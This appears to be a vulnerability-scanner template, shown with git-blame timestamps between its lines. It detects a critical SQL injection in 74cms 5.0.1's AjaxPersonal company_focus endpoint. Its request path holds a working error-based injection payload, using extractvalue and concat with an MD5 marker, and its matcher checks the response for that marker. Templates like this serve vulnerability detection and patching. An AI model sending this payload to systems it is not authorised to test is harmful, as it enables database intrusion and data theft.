2022-06-05 09:34:44 +00:00
id : 74cms-sqli
2022-03-02 14:43:09 +00:00
2021-04-06 18:29:29 +00:00
info :
name : 74cms Sql Injection
2022-04-22 10:38:41 +00:00
author : princechaddha
2022-05-17 09:18:12 +00:00
severity : critical
2022-06-05 09:34:44 +00:00
description : A SQL injection vulnerability exists in 74cms 5.0.1 AjaxPersonalController.class.php.
2022-03-02 20:37:30 +00:00
reference :
2022-06-05 09:34:44 +00:00
- https://github.com/possib1e/vuln/issues/3
2022-03-02 14:43:09 +00:00
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cwe-id : CWE-89
2022-06-05 09:34:44 +00:00
tags : 74cms,sqli
2021-04-06 18:29:29 +00:00
2022-06-30 02:59:32 +00:00
variables :
num : "999999999"
2021-04-06 18:29:29 +00:00
requests :
- method : GET
path :
2022-06-30 02:59:32 +00:00
- '{{BaseURL}}/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test") and extractvalue(1,concat(0x7e,md5({{num}}))) -- a'
2021-04-06 18:29:29 +00:00
matchers :
- type : word
words :
2022-06-30 02:59:32 +00:00
- '{{md5({{num}})}}'
2021-04-06 18:29:29 +00:00
part : body
2022-03-02 14:43:09 +00:00
2022-06-05 09:34:44 +00:00
# Enhanced by ritikchaddha on 2022/05/05